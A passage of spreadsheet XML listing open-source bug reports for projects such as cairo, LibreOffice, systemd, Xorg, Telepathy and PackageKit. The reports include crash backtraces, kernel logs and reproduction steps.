bp-0cb6bee3-25ba-11dd-bca0-0013211cbf8a
bp-6fda3d66-2a4a-11dd-93ee-001a4bd46e84
bp-2a222bc7-25b3-11dd-9514-0013211cbf8a
Stack:
_de_casteljau                 mozilla/gfx/cairo/cairo/src/cairo-spline.c:167
_cairo_spline_decompose_into  mozilla/gfx/cairo/cairo/src/cairo-spline.c:255 
_cairo_spline_decompose_into  mozilla/gfx/cairo/cairo/src/cairo-spline.c:257
          ... repeat a few thousand times ...
_cairo_spline_decompose_into  mozilla/gfx/cairo/cairo/src/cairo-spline.c:257
_cairo_spline_decompose_into  mozilla/gfx/cairo/cairo/src/cairo-spline.c:261
_cairo_spline_decompose       mozilla/gfx/cairo/cairo/src/cairo-spline.c:278
_cairo_filler_curve_to        mozilla/gfx/cairo/cairo/src/cairo-path-fill.c:132
_cairo_path_fixed_interpret  
mozilla/gfx/cairo/cairo/src/cairo-path-fixed.c:524
_cairo_path_fixed_fill_to_traps
mozilla/gfx/cairo/cairo/src/cairo-path-fill.c:185
_cairo_surface_fallback_fill 
mozilla/gfx/cairo/cairo/src/cairo-surface-fallback.c:898
_cairo_surface_fill           mozilla/gfx/cairo/cairo/src/cairo-surface.c:1626
_cairo_gstate_fill            mozilla/gfx/cairo/cairo/src/cairo-gstate.c:1015
_moz_cairo_fill_preserve      mozilla/gfx/cairo/cairo/src/cairo.c:2177
gfxContext::Fill              mozilla/gfx/thebes/src/gfxContext.cpp:136
FillFastBorderPath            mozilla/layout/base/nsCSSRendering.cpp:1574
DrawBorderSides               mozilla/layout/base/nsCSSRendering.cpp:2209
DrawBorders                   mozilla/layout/base/nsCSSRendering.cpp:2629
nsCSSRendering::PaintBorder   mozilla/layout/base/nsCSSRendering.cpp:2836 
...
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/gfx/cairo/cairo/src/cairo-spline.c&amp;rev=1.14&amp;mark=255257261#261
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/gfx/cairo/cairo/src/cairo-spline.c&amp;rev=1.14&amp;root=/cvsroot&amp;mark=154161#153</t>
  </si>
  <si>
    <t>matspal</t>
  </si>
  <si>
    <t>LIBREOFFICE-78801</t>
  </si>
  <si>
    <t>Copying HTML from web browser - only plain text is pasted</t>
  </si>
  <si>
    <t>System Specs:
Ubuntu 14.04 x64
LibreOffice 4.2.4.2 (confirmed on 4.3 master)
Steps to Reproduce:
1. Go to a website with text and image(s) -- e.g. http://www.tufts.edu/alumni/magazine/fall2013/features/up-in-arms.html
2. Highlight text and image - copy
3. Paste into writer
Observed: Text is pasted image is skipped
Expected: Everything pasted
Regression</t>
  </si>
  <si>
    <t>SYSTEMD-79600</t>
  </si>
  <si>
    <t>Add a network-pre.target to avoid firewall leaks</t>
  </si>
  <si>
    <t>It looks like it's impossible to specify (in a cross-distro fashion) that a service should start up before any network interface configuration *begins*. (Before=network.target is too late.)
But such an ordering is essential for firewall services that need to avoid leaks. I propose the following:
1. Ship an empty network-pre.target.
2. Add to systemd-networkd.service and network.target:
[Unit]
Requires=network-pre.target
After=network-pre.target
3. Document #2 as a convention for other network interface configuration services to follow.
With this in place a firewall service can finally do:
[Unit]
Before=network-pre.target
[Install]
RequiredBy=network-pre.target</t>
  </si>
  <si>
    <t>rustybird+freedesktop.org</t>
  </si>
  <si>
    <t>SYSTEMD-54123</t>
  </si>
  <si>
    <t>[udevd] Problem with the virtual mouse when running in virtualbox as guest.</t>
  </si>
  <si>
    <t>There is a problem when running Linux (Archlinux) as guest inside virtualbox (Windows XP as host). The mouse can behave erratically (but the bug is not always reproducible). I had previously reported this bug in the archlinux bug tracker ( https://bugs.archlinux.org/task/30700 ). According to SÃ©bastien Luttringer of Archlinux this is due to a race condition on detection of the mouse status by udev in the guest.
Version: systemd-tools 188</t>
  </si>
  <si>
    <t>diolu</t>
  </si>
  <si>
    <t>HAL-15284</t>
  </si>
  <si>
    <t>Documentation incorrect re: alsa.device_pcm_class</t>
  </si>
  <si>
    <t>According to the HAL spec ALSA devices should have an 'alsa.device_pcm_class' property. But they don't:
$ lshal | grep pcm_class
  alsa.pcm_class = 'modem'  (string)
  alsa.pcm_class = 'modem'  (string)
  alsa.pcm_class = 'generic'  (string)
  alsa.pcm_class = 'generic'  (string)
  alsa.pcm_class = 'generic'  (string)</t>
  </si>
  <si>
    <t>REALMD-63906</t>
  </si>
  <si>
    <t>Use GTask instead of GSimpleAsyncResult</t>
  </si>
  <si>
    <t>Using GTask results in much more clean readable code and removes
some of the common bugs (such as unreffing a source_object) required
when using GSimpleAsyncResult directly.</t>
  </si>
  <si>
    <t>TELEPATHY-15198</t>
  </si>
  <si>
    <t>Crash when joining chatroom</t>
  </si>
  <si>
    <t>When I join jabber@conference.jabber.org gabble and empathy crash. Looking at gabble messages I see that:
** ERROR:(presence-cache.c:1227):gabble_presence_cache_get: assertion failed: (tp_handle_is_valid (contact_repo handle NULL))
Abandon (core dumped)
So it seems gabble assert for a wrong handle. Even if empathy sends bogus handles gabble shouldn't use g_assert for that but g_return_if_fail().
From empathy I see that:
...
TpChat: Message pending: lol
TpContactFactory: Contact added: (null) (78)
...
TpContactFactory: Failed to inspect handles: handle 78 is not currently a valid contact handle (type 1)
TpContactFactory: Failed to hold handles: handle 78 is not currently a valid contact handle (type 1)
TpContactFactory: Error getting presence: handle 78 is not currently a valid contact handle (type 1)
TpContactFactory: Error requesting aliases: handle 78 is not currently a valid contact handle (type 1)
TpContactFactory: Error getting known avatars tokens: handle 78 is not currently a valid contact handle (type 1)
TpContactFactory: Error getting capabilities: handle 78 is not currently a valid contact handle (type 1)
So empathy receives a message lol (muc backlog) from the handle 78 then gabble returns an error for everything I ask for that handle... Note that this message is the first backlog message I get when joining the room and all other messages comes from different handles and gabble accept them as valid handles.</t>
  </si>
  <si>
    <t>XORG-18097</t>
  </si>
  <si>
    <t>EXA + Composite causes GLX apps to hang</t>
  </si>
  <si>
    <t>Running glxgears under a composite-enabled DE (in my case Gnome) causes X to hang after a second or two. Screen no longer redraws load is increased significantly (7~8 on an otherwise idle system) but HW cursor still functions. Not reproducible with just a plain X server.
radeonhd from git master: efaebb70294055f371cd328124b23a343cea6a68
Alex Deucher and I narrowed it down to bad EXA/Composite interaction on IRC. Turning on EXANoComposite seems to work around it.
Neither dmesg nor Xorg.0.log seem to show anything.
I've observed this behaviour before CS branch merge but only after the GLX app has run for significantly longer or if I move around the window the app is in. Did not report earlier as I was unsure if it was due to my power management code.
The new CS code seems to expose the bug more consistently and quickly.</t>
  </si>
  <si>
    <t>PACKAGEKIT-26062</t>
  </si>
  <si>
    <t>Packagekit can not create service pack. Shows maximum recursion depth exceeded.</t>
  </si>
  <si>
    <t>This is self explanatory.
I shall update a few more packages which are giving same error.
[root@storage servicepack]# pkgenpack --package=kdeedu-kstars
Finding package name.
Creating service pack...
FIXME: need to call pk_progress_bar_start() earlier![=========================]         
setup               [=========================]         
info                [=========================]         
Failed to create '/root/servicepack/kdeedu-kstars-fedora-12-i686.servicepack': failed to download: Traceback (most recent call last):
  File /usr/share/PackageKit/helpers/yum/yumBackend.py line 1226 in _get_best_depends
    results = self.yumbase.findDeps(pkgs)
  File /usr/lib/python2.6/site-packages/yum/__init__.py line 1936 in findDeps
    for po in self.whatProvides(r f v):
  File /usr/lib/python2.6/site-packages/yum/depsolve.py line 161 in whatProvides
    pkgs = self.pkgSack.searchProvides(name)
  File /usr/lib/python2.6/site-packages/yum/packageSack.py line 416 in searchProvides
    return self._computeAggregateListResult(searchProvides name)
  File /usr/lib/python2.6/site-packages/yum/packageSack.py line 575 in _computeAggregateListResult
    sackResult = apply(method args)
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 1360 in searchProvides
    return self.searchPrco(name provides)
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 45 in newFunc
    return func(*args **kwargs)
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 1301 in searchPrco
    results.extend(self._search_primary_files(name))
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 45 in newFunc
    return func(*args **kwargs)
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 846 in _search_primary_files
    self._sql_pkgKey2po(rep cur results)
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 793 in _sql_pkgKey2po
    pkg = self._packageByKey(repo ob['pkgKey'])
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 688 in _packageByKey
    if exclude and self._pkgKeyExcluded(repo pkgKey):
  File /usr/lib/python2.6/site-packages/yum/sqlitesack.py line 559 in _pkgKeyExcluded
    if repo in self._all_excludes:
RuntimeError: maximum recursion depth exceeded</t>
  </si>
  <si>
    <t>thinklinux.ssh</t>
  </si>
  <si>
    <t>LIBREOFFICE-37835</t>
  </si>
  <si>
    <t>Option Menus Have Extra Pixels</t>
  </si>
  <si>
    <t>Created attachment 47443
Libre has some odd extra pixels next to drop down arrow on option menus
I was testing 3.4 RC2 and noticed the option menus seems to have an extra few odd pixels to their right.  I have attached a shot of Libre vs OOo with xmag's of the area.  I tried changing themes and the issue is still present.  No way to test on other operating systems so marking as Linux.</t>
  </si>
  <si>
    <t>XORG-69375</t>
  </si>
  <si>
    <t>[NV4E] GPU lockup when using chrome/flash</t>
  </si>
  <si>
    <t>Created attachment 85858
dmesg output
I recent upgrade using apt-get dist-upgrade on debian testing ~2 weeks ago has caused chrome to start looking up the GPU.
dmesg highlights:
Linux version 3.9-1-amd64
[  805.747928] nouveau E[  PGRAPH][0000:00:05.0]  ERROR nsource: DATA_ERROR nstatus: BAD_ARGUMENT
[  805.747945] nouveau E[  PGRAPH][0000:00:05.0] ch 3 [0x00056000 chrome[3853]] subc 2 class 0x0039 mthd 0x0314 data 0x01197000
[  836.696327] nouveau E[   PFIFO][0000:00:05.0] DMA_PUSHER - ch 3 [chrome[3853]] get 0xbeef0200 put 0x0065a6f4 state 0xc0028188 (err: MEM_FAULT) push 0x00001000
[  850.504026] nouveau E[chrome[3853]] failed to idle channel 0xcccc0000 [chrome[3853]]
[  853.508018] nouveau E[chrome[3853]] failed to idle channel 0xcccc0000 [chrome[3853]]
[  863.804030] nouveau E[Xorg[2162]] reloc wait_idle failed: -16
[  863.804036] nouveau E[Xorg[2162]] reloc apply: -16
[  865.743035] nouveau E[     DRM] GPU lockup - switching to software fbcon
[  866.804032] nouveau E[Xorg[2162]] reloc wait_idle failed: -16
[  866.804079] nouveau E[Xorg[2162]] reloc apply: -16
[  869.804037] nouveau E[Xorg[2162]] reloc wait_idle failed: -16
[  869.804103] nouveau E[Xorg[2162]] reloc apply: -16
[  887.836034] nouveau E[Xorg[2162]] failed to idle channel 0xcccc0000 [Xorg[2162]]
[  890.836025] nouveau E[Xorg[2162]] failed to idle channel 0xcccc0000 [Xorg[2162]]</t>
  </si>
  <si>
    <t>taylor_tails</t>
  </si>
  <si>
    <t>DRI-108725</t>
  </si>
  <si>
    <t>[CI][BAT] igt@kms_chamelium@(dp-edid-read|dp-crc-fast) - fail - Failed assertion: finished</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5131/fi-kbl-7500u/igt@kms_chamelium@dp-edid-read.html
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5131/fi-kbl-7500u/igt@kms_chamelium@dp-crc-fast.html
Starting subtest: dp-crc-fast
(kms_chamelium:2860) CRITICAL: Test assertion failure function wait_for_connector file ../tests/kms_chamelium.c:132:
(kms_chamelium:2860) CRITICAL: Failed assertion: finished
Subtest dp-crc-fast failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-45453</t>
  </si>
  <si>
    <t>db no bool support =&gt; any query with many rows fails to open in datasheet</t>
  </si>
  <si>
    <t>I have connected to Firebird using ODBC. Name of database is employee.fdb password is masterkey user is sysdba
This database installs with Firebird
LibreBase opened database but when I attempt to execute this:
select * from COUNTRY
appears this error:
SQL Status: HY000
Error code: -206
[ODBC Firebird Driver][Firebird]Dynamic SQL Error
SQL error code = -206
Column unknown
TRUE
At line 1 column 33
some other information is given in this bug:
Bug 34432 - firebird ODBC: LibO crashes on 64 bits</t>
  </si>
  <si>
    <t>DRI-94699</t>
  </si>
  <si>
    <t>[BSW] igt / gem_userptr_blits / sync-unmap-cycles fails</t>
  </si>
  <si>
    <t>Created attachment 122557
BSW-gem_userptr_blits-sync-unmap-cycles-kern.log
Hardware: 
Motherboard: Aspire XC-704 
cpu model name : Intel(R) Pentium(R) CPU N3700 @ 1.60GHz 
cpu model : 76 
cpu family : 6 
Graphic card: Device 22b1 (rev 21)
Software:
Bios: R01-A2
kernel nightly 4.5 10e913a  from https://cgit.freedesktop.org/cgit/?url=drm-intel/
  commit 10e913a48ca36790da9b58bed8729598ea79ebdb
  Author: Imre Deak 
  Date:   Thu Mar 17 15:23:17 2016 +0200
  drm-intel-nightly: 2016y-03m-17d-13h-22m-41s UTC integration manifest
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
libdrm-2.4.67-7 49041c3 from git://anongit.freedesktop.org/mesa/drm
IGT 1.14 8f6ed9e from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
------
1. Execute IGT test: gem_userptr_blits@sync-unmap-cycles
Actual result:
--------------
1. Test is Pass
Expected result:
----------------
1. Test is fail</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-4941</t>
  </si>
  <si>
    <t>new account for jmichael@suse.de</t>
  </si>
  <si>
    <t>Hey I was hoping to get a cvs account to be able to check in cleanups to the
xtest tree.
Jesse Michael
jmichael@suse.de</t>
  </si>
  <si>
    <t>jmichael</t>
  </si>
  <si>
    <t>LIBREOFFICE-39348</t>
  </si>
  <si>
    <t>Deleted sentences during 'Spelling and Grammar' (F7) when 'Check grammar' box has been activated/deactivated</t>
  </si>
  <si>
    <t>use german hunspell
Create a new doc and paste this text into it 
Finanzwesen ...
Plakat
Es ist ein Creuz.
Hit F7 to open spell checking dialog.
Deactivate/Activate Grammatik prÃ¼fen/Check grammar flag.
Hit Cancel to close dialog:
Note: The last sentence has been removed!</t>
  </si>
  <si>
    <t>andre.pietsch</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-32599</t>
  </si>
  <si>
    <t>Git repositories for split xcb-util</t>
  </si>
  <si>
    <t>Hello
I have been working on splitting up xcb-util git repository in several git repositories as discussed months ago on XCB mailing list[0]. I would like to push the git repositories currently available on [1] under xcb-util-split-clean directory.
Could you please create the following git repositories in xcb/:
- util-common-m4
- util-image
- util-keysyms
- util-renderutil
- util-wm
- util-old
Thanks much!
Cheers
Arnaud Fontaine
[0] http://lists.freedesktop.org/archives/xcb/2010-March/thread.html
[1] http://git.mini-dweeb.org/</t>
  </si>
  <si>
    <t>arnaud</t>
  </si>
  <si>
    <t>LIBREOFFICE-51317</t>
  </si>
  <si>
    <t>[cppunit] TestCaseDecorator assumes ownership and should not allow copies</t>
  </si>
  <si>
    <t>TestCaseDecorator assumes ownership of the Test and will delete it so default copy c'tor and operator= will result in double delete.
Solution: making them private!</t>
  </si>
  <si>
    <t>LIBREOFFICE-70285</t>
  </si>
  <si>
    <t>cleanup generated C++ code ...</t>
  </si>
  <si>
    <t>The existing 
codemaker/source/cppumaker/cpputype.cxx
generates lots of ugly / old-world: com::sun::star:: namespace blurb.
These should all be replaced with css:: prefixes which should make the generated code much easier to read.
Checkout eg.
workdir/unxlngi6.pro/UnoApiHeadersTarget/offapi/comprehensive/com/sun/star/frame/FrameLoaderFactory.hpp:
to see the before / after - and re-run 'make' in the top-level to re-generate.
Thanks !</t>
  </si>
  <si>
    <t>noelgrandin</t>
  </si>
  <si>
    <t>MESA-69694</t>
  </si>
  <si>
    <t>Xorg doesn't start on KABINi with radeonsi</t>
  </si>
  <si>
    <t>Created attachment 86336
gdb trace on segfault
I bougth a brand new laptop with AMD APU A4-5000 (KABINI) which have two amd gpu (8330 integrated + 8550M dedicated).
I just tried to recompile everithing to make Xorg work with radeonsi.
At then end I have:
1)kernel 3.12-rc1 (with latest Alex Deucher 6 patches the first is https://patchwork.kernel.org/patch/2922981/ dealing with clocks on SI)
2) libdrm git
3) mesa git
4) xf86-video-ati git
5) glamor git
6) Xserver git
I cannot start Xorg (the screen goes black) but I can ssh into it a trace the segfault with gdb.</t>
  </si>
  <si>
    <t>mpiazza</t>
  </si>
  <si>
    <t>TELEPATHY-24699</t>
  </si>
  <si>
    <t>don't abuse M_T_Action for nudges</t>
  </si>
  <si>
    <t>16:06  does MSN have the concept of an action message?
16:06  arguably Empathy should turn (ACTION drinks heavily) into 
              (NORMAL *** drinks heavily) for protocols that can't do 
              actions properly
16:06  wjt: well it only support if it fhe action is nudge
16:07  istaz: \o\ /o/ \o/ MSN!
16:07  we could probably convert it inside butterfly to display a irc 
               style message
16:07  Maybe Empathy should send /me laughs as-is
16:07  istaz: hang on. so you claim to support the ACTION message type 
              then if the action is not nudge you error?
16:07  (if the CM doesn't do Message_Type_Action)
16:08  smcv: yep
16:08  !!
16:08  that's not what M_T_Action is for
16:08  istaz: please no
16:08  istaz sounds great
16:08  istaz: that blocks the UI's ability to do what I suggested a 
              dozen lines ago or what wjt suggested half a dozen lines ago
16:08  having the UI be
16:08  *** drinks heavily
16:09  or even
16:09  /me drinks heavily
16:09  would be considerably better than just erroring!
16:09  if we support nudges it should be via an interface that can also               support http://xmpp.org/extensions/xep-0224.html
16:09  probably
16:09  smcv: couldn't the ui do it when it receive an error?
16:10  istaz: I would consider that to be deeply deeply bong.
16:10  istaz: InvalidArgument (or whatever it is you reply with) is 
              nowhere near enough information to infer oh this Channel that 
              claims to support ACTION secretly doesn't
16:11  smcv: and another ugly things is that when we receive a nudge we 
               actually send a message  sends you a nudge (without 
               localization)
16:11  istaz: that's wrong too but a little less so
16:11  smcv: I should probably fix that then
16:11  smcv empathy does not uses Messages
16:11  smcv and does not try any caps
16:12  smcv we are using old Text iface )
16:12  Zdra: ok so Empathy is also at fault it should call 
              Text.GetMessageTypes() and use the result for graceful fallback
16:12  Zdra: however butterfly currently prevents that from working in 
              any case
16:13  to the bug-filing-mobile!</t>
  </si>
  <si>
    <t>DESKTOP-FILE-UTILS-86910</t>
  </si>
  <si>
    <t>invalid .desktop file crashes desktop-file-install</t>
  </si>
  <si>
    <t>Created attachment 110314
corrupt .desktop file
An invalid .desktop file (like the attached sample) causes a crash in desktop-file-install. Originally found on OpenBSD and reproduced on CentOS:
#0  0x00001d07fdb0cf78 in desktop_file_fixup (keyfile=0x1d0a19c66000 
    filename=0x1d0a816a48c0 /tmp/testcase.desktop) at validate.c:3172
3172	        if (g_str_has_prefix (keys[j] registered_desktop_keys[i].name) &amp;&amp;
(gdb) bt
#0  0x00001d07fdb0cf78 in desktop_file_fixup (keyfile=0x1d0a19c66000 
    filename=0x1d0a816a48c0 /tmp/testcase.desktop) at validate.c:3172
#1  0x00001d07fdb0d39e in process_one_file (filename=0x1d0a816a48c0 /tmp/testcase.desktop 
    err=0x7f7fffff1520) at install.c:167
#2  0x00001d07fdb0e891 in main (argc=1 argv=0x7f7fffff15b8) at install.c:932
(gdb) bt full
#0  0x00001d07fdb0cf78 in desktop_file_fixup (keyfile=0x1d0a19c66000 
    filename=0x1d0a816a48c0 /tmp/testcase.desktop) at validate.c:3172
	keylen = 8
	j = 0
	keys = (gchar **) 0x0
	keys_nb = 6044657229790786732
	i = 19
#1  0x00001d07fdb0d39e in process_one_file (filename=0x1d0a816a48c0 /tmp/testcase.desktop 
    err=0x7f7fffff1520) at install.c:167
	new_filename = 0x1ed 
	kf = (GKeyFile *) 0x1d0a19c66000
	rebuild_error = (GError *) 0x7f7fffff15b8
	tmp = (GSList *) 0x1d0a6fe43850
	__FUNCTION__ = process_one_file
#2  0x00001d07fdb0e891 in main (argc=1 argv=0x7f7fffff15b8) at install.c:932
	context = (GOptionContext *) 0x1d0a95a44f00
	group = (GOptionGroup *) 0x1d0a95a44400
	err = (GError *) 0x0
	i = 0
	args_len = 1
	dir_permissions = 493
	basename = 0x1d0a816a4460 'ÃŸ' 
(gdb) 
The sample was generated with AFL.</t>
  </si>
  <si>
    <t>jasper</t>
  </si>
  <si>
    <t>XORG-104811</t>
  </si>
  <si>
    <t>Support Gamma Controls in Modesetting Driver</t>
  </si>
  <si>
    <t>The modesetting driver is missing gamma support
Steps to reproduce:
1. With modesetting driver installed Launch any SDL game such as OpenArena or Urban Terror
2. Adjust gamma settings
Expected Results:
Game world is visible
Actual Results:
Gamma levels do not change leaving all games too dark to play
In my testing Nvidia proprietary xf86-video-intel xf86-video-ati and xf86-video-nouveau all support gamma controls. Only modesetting seems to lack this essental feature for playing SDL based games.</t>
  </si>
  <si>
    <t>TELEPATHY-79577</t>
  </si>
  <si>
    <t>[gabble] Fix some clang/tartan errors</t>
  </si>
  <si>
    <t>http://cgit.collabora.com/git/user/cassidy/telepathy-gabble/</t>
  </si>
  <si>
    <t>POPPLER-7547</t>
  </si>
  <si>
    <t>Document incorrectly rendered</t>
  </si>
  <si>
    <t>I have a document that is incorrectly rendered. The text starts to be drawn very
far away from the upper left corner it is almost drawn in the lower rigth corner. 
The document with the problems is quite big. Find several  screenshots attached.
It is strage but it also seems that the diagrams a drawn mostly ok.
I'm using poppler thorugh evince. Poppler version is CVS HEAD.</t>
  </si>
  <si>
    <t>UIM-1638</t>
  </si>
  <si>
    <t>uim-canna cannot convert same preedit twice</t>
  </si>
  <si>
    <t>Reproduce procedure.
1. Use uim-canna as input method
2. Press Shift-space to enable uim-canna
3. Input some texts.
4. Convert it by space.
5. Press backspace to revert conversion
6. Press space to convert
And you'll get backtrace.
I tested by revision 1485. Bridge is gtk-immodule.</t>
  </si>
  <si>
    <t>tkng</t>
  </si>
  <si>
    <t>LIBREOFFICE-62682</t>
  </si>
  <si>
    <t>SVG Export Crashes for Hyperlinks with Linebreaks</t>
  </si>
  <si>
    <t>Created attachment 76954
Example Presentation
Hyperlinks in Text Areas are wrapped if they are too long for the box. If a document contains such a wrapped link an export to SVG lets LibreOffice crash.
Please try it with the attached file.</t>
  </si>
  <si>
    <t>WAYLAND-89235</t>
  </si>
  <si>
    <t>Microsoft mouse not recognized on GNOME with Wayland</t>
  </si>
  <si>
    <t>Description of problem:
The Microsoft Wireless Optical Desktop 3.0 mouse isn't being recognized by GNOME on Wayland. The USB ID is 045e:009d. GNOME on Wayland works fine with other mouse+keyboard wireless bundles like the Logitech (Holtek) with the USB ID 04d9:a01c.
Version-Release number of selected component (if applicable): 
libinput-0.7.0.x86_64 (2.20141211git58abea394.fc21)
mutter-3.14.3.x86_64 (1.fc21)
How reproducible: Always at least on this system.
Steps to Reproduce:
1. Have the said mouse connected.
2. Start the GNOME on Wayland session trough gdm.
3. Try to move the said mouse.
Actual results:
It will not move/click altough it recognizes keyboard input and mouse input from other vendors.
Expected results:
Out-of-the-box working mouse support for all USB HID-compliant mouses.
Additional info:
Additional GPU is also not being recognized (I will open another bug for this which is waaaaay more complex).</t>
  </si>
  <si>
    <t>bcdonadio</t>
  </si>
  <si>
    <t>TELEPATHY-39346</t>
  </si>
  <si>
    <t>telepathy-qt fails to build with clang</t>
  </si>
  <si>
    <t>Building telepathy-qt4 0.7.1 with llvm/clang trunk r135391 on FreeBSD/amd64 results in:
n file included from /work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/optional-interface-factory.cpp:23:
In file included from /work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/OptionalInterfaceFactory:8:
/work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/optional-interface-factory.h:100:21: warning: parentheses were disambiguated as a function declarator
        QString name(QLatin1String(Interface::staticInterfaceName()))
                    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/optional-interface-factory.h:100:47: error: parameter declarator cannot be qualified
        QString name(QLatin1String(Interface::staticInterfaceName()))
                                   ~~~~~~~~~~~^
/work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/optional-interface-factory.h:116:21: warning: parentheses were disambiguated as a function declarator
        QString name(QLatin1String(Interface::staticInterfaceName()))
                    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/work/a/ports/net-im/telepathy-qt4/work/telepathy-qt4-0.7.1/TelepathyQt4/optional-interface-factory.h:116:47: error: parameter declarator cannot be qualified
        QString name(QLatin1String(Interface::staticInterfaceName()))
                                   ~~~~~~~~~~~^
[ 48%] 2 warnings and 2 errors generated.
*** Error code 1</t>
  </si>
  <si>
    <t>pawel.worach</t>
  </si>
  <si>
    <t>XORG-28144</t>
  </si>
  <si>
    <t>JXRenderMark causes system freeze</t>
  </si>
  <si>
    <t>Created attachment 35707
xorg log
Running the JXRendermark reliably freezes my system when executing the Transformed Blit Billinear sharp edges-test.
JXRenderMark can be downloaded from: http://93.83.133.214/downloads/JXRenderMark-1.0.1.zip
Basically the benchmark only executes a series of render-commands like x11perf does the test which causes the hang basically looks like the code at the end of the report.
System-Information:
X.Org X Server 1.8.0
Radeon 6.13.0
ATI Radeon Mobility 9000 (M9) Lf (AGP) (ChipID = 0x4c66)
void billinearTransformedBlit(int area int x int y)
{
  int maskSize = area/8
  maskSize = maskSize == 0 ? 1 : area
  area = maskSize*8
  XRenderFillRectangle (display PictOpSrc alphaMask 
  XTransform xf
 //transform changes omited
 XRenderSetPictureTransform (display sourceImage 
 //transform changes omited
 XRenderSetPictureTransform (display alphaMask 
  XRenderComposite(display PictOpOver sourceImage alphaMask backBuffer 0 0 0 0 x y area area)  
  XRenderFillRectangle (display PictOpClear alphaMask 
   //transform changes omited
  XRenderSetPictureTransform (display alphaMask 
}</t>
  </si>
  <si>
    <t>XORG-72245</t>
  </si>
  <si>
    <t>Lib/Xmu</t>
  </si>
  <si>
    <t>ShapeWidg.c:204: possible bad if test ?</t>
  </si>
  <si>
    <t>I just ran the static analyser cppcheck over the source
code of libXmu-1.1.1. It said
[ShapeWidg.c:204] -&gt; [ShapeWidg.c:204]: (style) Same expression on both sides of '||'.
Source code is
  if (width &lt; 3 || width &lt; 3)
    return
Maybe 
  if (width &lt; 3 || height &lt; 3)
    return
would be better code.</t>
  </si>
  <si>
    <t>XORG-14630</t>
  </si>
  <si>
    <t>[G35 HDMI] 2.2.0: green screen with Onkyo TX-SR875 Receiver</t>
  </si>
  <si>
    <t>Created attachment 14512
XRandR Verbose Ouput when connected to the Onkyo receiver at 1024x768
I'm trying to connect the HDMI output from my ASUS P5E-VM-HDMI motherboard to my receiver. 
I can get working 1280x720 (720p) output if I bypass the receiver and connect directly to my Samsung 42inch plasma. However that mode just shows up as a green screen when connected my receiver. The receiver is full 1080p compatible and will pass through those signals (my ps3 outputs 1080p which is down converted by the receiver to 720p for my tv).
I'm using debian unstable (kernel 2.6.24+13 xserver-xorg 1:7.3+10 xserver-xorg-video-intel 2:2.2.0.90-3)
There are numerous problems with getting HDMI to work on my receiver. I'll list them below
a) the latest driver (both latest git sources and the packaged 2.2.1 sources that was announced on the mailing list) hangs the system immediately when X starts. The system needs to be power toggled. The logs are all empty and I don't have the serial setup necessary to trap the kernel oops.
The 2.2.0 debian packaged driver works (but has issues as stated below). I have not tried the 2.2.1 driver with my tv.
b) the HDMI output is very flaky. I can get basic console output (i.e. no vga=x lines on grub) most of the time. But sometimes even this does not display. 
b) I managed to get the receiver into a mode where it would output 1024x768. I don't know what I did (console mode would not display in this state. i.e. the receiver would just say No Signal when I killed the xserver) but I did manage to extract xrandr and full /var/log/Xorg.log output. After a reboot I just get a black screen when starting X with the mode that these logs were extracted from. I've attached the logs which have full EDID dumps and supported resolutions. I've tried using those resolutions and nothing displays.
However even when the Onkyo was displaying at 1024x768 the display would go off every 3s or so (for about 1/2s each time).
c) 1280x720 works when connected to my tv directly. but just gives a green screen when connected to my receiver. I have the same 30 pixels to the left problem mentioned earlier as well when connected to my tv (using a smaller than 720p mode to correct for overscan)
d) I can get HDMI audio to work using the latest (1.16) Alsa drivers. however it only works in console mode. 
When connected to my receiver I get no audio or video (even when video worked during the collection of logs as described in b) ) the moment I enable the HDMI audio out IEC-1 device in alsamixer.
when connected to my tv when X is running turning on the IEC-1 device makes the screen flicker crazily. Every now and then the tv will lose signal and the screen will go blank. Any audio that is playing will cut out when signal is lost.
in both cases (receiver and tv) audio and video show no problems when in console mode. My receiver detects the HDMI audio as a pure audio source and plays it fine in console mode.
What else can I do to help debug this?
Rajesh</t>
  </si>
  <si>
    <t>rajesh</t>
  </si>
  <si>
    <t>XORG-67176</t>
  </si>
  <si>
    <t>Primary output broken in zaphod mode (regression)</t>
  </si>
  <si>
    <t>Created attachment 82821
Xorg.log from a broken session
After upgrading xf86-video-intel to latest git my primary display
(connected via HDMI) no longer works: the display simply enters standby mode
after starting X.  The display is still there and poking at it with xrandr
-display :0.0 shows that it is somehow configured to a nonsense mode:
  Screen 0: minimum 320 x 200 current 320 x 200 maximum 32767 x 32767
  HDMI1 connected (normal left inverted right x axis y axis)
     1920x1080      59.9 +   60.0     50.0     60.0
     1920x1080i     30.0     25.0
     1680x1050      59.9
     1280x1024      75.0     60.0
     1152x864       75.0
     1280x720       50.0     60.0
     1024x768       75.1     60.0
     832x624        74.6
     800x600        75.0     60.3     56.2
     720x576        50.0
     720x480        59.9
     640x480        75.0     60.0     59.9
     720x400        70.1
The output starts to work again after manually configuring to 1920x1080 but
pointer screen crossings are all messed up.  Bisecting pinpoints the following
commit in xf86-video-intel reverting this commit on top of master appears to
correct the issues:
  ea508c177c961ba2f00129476a22a32ff3ea6f1b is the first bad commit
